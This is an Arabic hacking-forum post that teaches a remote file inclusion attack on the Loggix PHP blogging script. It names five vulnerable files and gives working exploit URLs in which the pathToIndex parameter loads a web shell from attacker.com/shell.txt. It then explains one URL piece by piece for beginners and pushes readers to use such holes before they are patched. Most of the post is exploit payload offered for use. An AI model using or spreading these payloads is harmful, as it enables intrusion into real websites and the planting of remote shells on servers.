#~VoLc4n0~#
عدد النقاط : 11
اقتباس #Dork : No DoRk f0R ScRipT KiDDieS يعني كلمه البحث في جوجل هي لايوجد كلمه للبحث ............(اخترعها انت من الرابط ) اقتباس #file : # Calendar.php # Comment.php # Rss.php # Trackback.php # LM_Downloads.php هذه اسماء الملفات المصابه بالانكلوود اقتباس #3xplo!t : #http://target.com/[path]/lib/Loggix/Module/Calendar.php?pathToIndex=http://attacker.com/shell.txt??? #http://target.com/[path]/lib/Loggix/Module/Comment.php?pathToIndex=http://attacker.com/shell.txt??? #http://target.com/[path]/lib/Loggix/Module/Rss.php?pathToIndex=http://attacker.com/shell.txt??? #http://target.com/[path]/lib/Loggix/Module/Trackback.php?pathToIndex=http://attacker.com/shell.txt??? #http://target.com/[path]/modules/downloads/lib/LM_Downloads.php?pathToIndex=http://attacker.com/shell.txt??? ################################################## ###################### يعني الاستغلال ممممم خلينا نشرح استغلال واحد اقتباس #http://target.com/[path]/lib/Loggix/Module/Rss.php?pathToIndex=http://attacker.com/shell.txt??? #http://target.com/ اسم الموقع الهدف (يلي عليه السكربت) [path]/ ........... يعني اسم المجلد يلي عليه السكربت (اذا كان السكربت داخل مجلد) اقتباس ]/lib/Loggix/Module/Rss.php?pathToIndex= مسار الملف المصاب على السكربت اقتباس http://attacker.com/shell.txt??? رابط شل بامتداد txt ما اعتقد صعب الانكلود بسيط جدا --------------------------------------- نصيحه من ذهب اتركك اخي من مواقع السكيورتي هذه لانو ما بفيها ثغرات الايكون يلي اكشف الثغره زهق منها يعني مثلا انا بكتشف ثغره بخترق فيها كل السكربتات يلي ع النت وبعدها برميها لمواقع السكيورتي وبتلقى صار المعظم عامل ترقيع للثغره ادخل دورات المنتدى فهي دورات حقيقه للثغرات وفيك تستفيد اكثر بمليون مره وتوصل لمستوى رائع بالتوفيق